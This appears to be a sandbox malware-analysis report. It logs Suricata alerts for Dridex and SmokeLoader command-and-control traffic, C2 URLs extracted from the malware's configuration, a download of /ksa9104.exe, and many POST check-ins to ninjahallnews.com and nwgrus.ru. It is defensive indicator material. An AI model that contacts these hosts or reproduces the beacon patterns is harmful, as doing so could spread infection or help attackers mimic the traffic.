    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49959 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49965 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49935 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49965 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49977 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49971 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49977 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49942 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49989 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49971 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50001 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49989 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:50001 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50024 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:50024 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50030 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:50030 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50008 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49983 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50061 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50065 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50055 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49983 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:50065 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49924 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49924 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:50008 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:50061 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50067 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50036 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:50067 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:50036 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50063 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:50063 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49995 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49995 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50015 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:50015 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50043 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:50043 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50060 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:50060 -> 23.145.40.168:443
    Source: Network traffic | Suricata IDS: 2019082 - Severity 1 - ET MALWARE Windows route Microsoft Windows DOS prompt command exit OUTBOUND : 192.168.2.4:50069 -> 23.145.40.113:443
    Source: C:\Windows\explorer.exe | Network Connect: 201.103.8.135 80
    Source: C:\Windows\SysWOW64\explorer.exe | Network Connect: 23.145.40.168 443
    Source: C:\Windows\explorer.exe | Network Connect: 180.75.11.133 80
    Source: C:\Windows\explorer.exe | Network Connect: 23.145.40.164 443
    Source: Malware configuration extractor | URLs: https://ninjahallnews.com/search.php
    Source: Malware configuration extractor | URLs: https://fallhandbat.com/search.php
    Source: Joe Sandbox View | IP Address: 23.145.40.164
    Source: Joe Sandbox View | ASN Name: UninetSAdeCVMX
    Source: Joe Sandbox View | ASN Name: SURFAIRWIRELESS-IN-01US
    Source: Joe Sandbox View | ASN Name: WEBE-MY-AS-APWEBEDIGITALSDNBHDMY
    Source: Joe Sandbox View | JA3 fingerprint: 72a589da586844d7f0818ce684948eea
    Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: Network traffic | Suricata IDS: 2829848 - Severity 2 - ETPRO MALWARE SmokeLoader encrypted module (3) : 23.145.40.168:443 -> 192.168.2.4:49915
    Source: global traffic | HTTP traffic detected: GET /ksa9104.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 23.145.40.164
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://emovkvrsbdl.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 234 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://qlmbybhxbuhwwks.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 315 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://dkjcfovkypdsnjsq.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 276 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://ifvxyamcogdoh.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 324 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://jhsgrosrfeyc.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 227 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://snwbetxwxfjxjjcj.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 213 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://duxssctxidfvcwn.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 321 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://onmervjnyngctx.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 335 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://gapeuqmkxloigpbr.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 232 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://toeqqmleovvia.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 352 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://bqjkmpxvvpbja.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 345 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://jesubehqcutadrf.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 358 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://morbrftngjk.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 291 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://shalkugnmyu.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 341 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://ubaoujicoyurcry.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 287 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://oriixfynfaeoogt.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 211 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://hqstyqadnnvm.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 333 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://hlglmlpnwcq.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 254 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://xuoelobbpmbhamy.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 215 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://ninjahallnews.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 4431 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://qotplnnnyldonj.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 109 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://cubjgioqceo.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 241 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://jcipjgavjhg.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 109 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://qdnfexfeugqvww.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 109 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://hoxyxvpdayru.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 109 | Host: ninjahallnews.com
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://arlhmhxchhgqep.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 336 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://tdpshksrvfora.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 333 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://uhxuuwgfmyhe.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 163 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://hkuvmvjfakdhd.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 153 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://gspricnhwajrk.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 116 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ihkjhoeohsucndfk.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 341 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://lpitxyhvwvj.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 356 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://yltrrjxrgdt.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 293 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://jypectwcaivky.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 147 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://uvanlbvtcqkc.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 270 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://jkgktqvsjdwb.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 300 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://cxrauupqkavo.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 157 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://fmrccqvtujxqbxpg.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 296 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://keeemaaxcllp.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 171 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://iwmxjihevykqvbos.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 367 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://lxadwtocjtceer.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 213 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://hvtgqqwlcbupjdi.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 194 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://cestfyhpiwlpo.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 200 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://qocskrvscrey.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 158 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://tcqfwxekwxifmk.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 346 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://qhndxwhkmipxgbaj.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 122 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://awkedsxfgif.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 221 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://xnrwcbelwfy.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 120 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://hidbwvhnrpsqtckd.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 167 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://kldixuwrvoj.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 322 | Host: nwgrus.ru
    Source: global traffic | HTTP traffic detected: POST /tmp/index.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://jrduoddrbbwoyfog.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 312 | Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fadawnjwyvdbowke.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 248Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ejoaxqvdwaljnps.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qmmqfrtscgkdrbea.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 229Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kcwpxhfqrcwcynne.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ksfanihxkdmgc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gshbntjmlxbreay.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 304Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mqkcxjfgdkafebli.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 290Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pvrcqmbcktsc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 236Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gvwiwavaujycn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://anqkqcglkprylr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lbnjhrckmixdmp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: nwgrus.ru
